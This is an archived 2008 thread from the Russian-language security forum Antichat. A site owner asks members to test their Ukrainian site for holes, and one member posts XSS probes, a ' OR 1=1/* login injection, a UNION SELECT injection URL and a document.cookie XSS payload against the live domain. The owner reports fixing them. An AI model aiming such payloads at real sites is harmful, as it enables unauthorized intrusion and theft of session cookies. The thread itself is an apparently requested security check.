http://expert.rv.ua/ [Архив] - Форум АНТИЧАТ

n0153r

12.04.2008, 22:13

Прошу проверить http://expert.rv.ua/
Движок свой.
Форум РНРВВ.

desTiny

13.04.2008, 20:40

А на русской мовi нету?

n0153r

14.04.2008, 01:05

А на русской мовi нету?
Ну а какая разница ?
Если уж так нужно вот :
http://translate.google.com/translate_t?hl=ru
http://pereklad.online.ua/
Переводи если что неясно.
Или говори я тебе переведу.

Shawn1x

14.04.2008, 07:34

Там не на русском написано! Как проверять?

*halkfild:
тебе сильно нужен контент.. или ты совсем не понимаешь, что там написано? /*одно с решений для непонятливых написано выше.. меньше оффтопа, пишите уязвимости =\*/

LEE_ROY

14.04.2008, 10:04

бле на русском нен а русском там идут пост и гет запросы, а они все одинаковые. проверять как обычно, ничего непоменялось.=\

lsass.exe

14.04.2008, 10:20

глянул, вроде все норм. Смотрел только сайт, на форум не заходил ;)

Ponchik

15.04.2008, 06:25

При выключеном экранировании (непомню как точно это называется) возможна XSS
_http://expert.rv.ua/index.php/xsshere
в js такая штука
uri = "/index.php/xsshere";
===============
Подозрение на SQL Inj
Жмакаем "Забули пароль?"
Пишем логин "loleg" мыло "loleg@mail.ru"
Отвечает "Невірний логін!"

Пишем логин 'OR 1=1/* мыло "loleg@mail.ru"
Отвечает "E-mail не відповідає E-mail введеному при регістрації!" тоесть пропускает запрос :rolleyes:
===============
Вывода нет (а может и есть лень копать)
_http://expert.rv.ua/?rs=cpc&rst=&rsrnd=1201&rsargs[]=-2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1,12/*&rsargs[]=18&rsargs[]=4&rsargs[]=0

<offtop>Бойтесь мну :D </offtop>

n0153r

15.04.2008, 23:04

При выключеном экранировании (непомню как точно это называется) возможна XSS
_http://expert.rv.ua/index.php/xsshere
в js такая штука
uri = "/index.php/xsshere";
===============
Подозрение на SQL Inj
Жмакаем "Забули пароль?"
Пишем логин "loleg" мыло "loleg@mail.ru"
Отвечает "Невірний логін!"

Пишем логин 'OR 1=1/* мыло "loleg@mail.ru"
Отвечает "E-mail не відповідає E-mail введеному при регістрації!" тоесть пропускает запрос :rolleyes:
===============
Вывода нет (а может и есть лень копать)
_http://expert.rv.ua/?rs=cpc&rst=&rsrnd=1201&rsargs[]=-2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1,12/*&rsargs[]=18&rsargs[]=4&rsargs[]=0

<offtop>Бойтесь мну :D </offtop>
Спасибо большое :) поправил.
С меня + :cool: :cool:

Ponchik

16.04.2008, 00:31

В догонку :D
_http://expert.rv.ua/?rs=<script>alert(document.cookie)</script>

n0153r

11.05.2008, 14:03

Всем спасибо тогда за то что указали на слабие места :)
Снимаю сайт с проверки.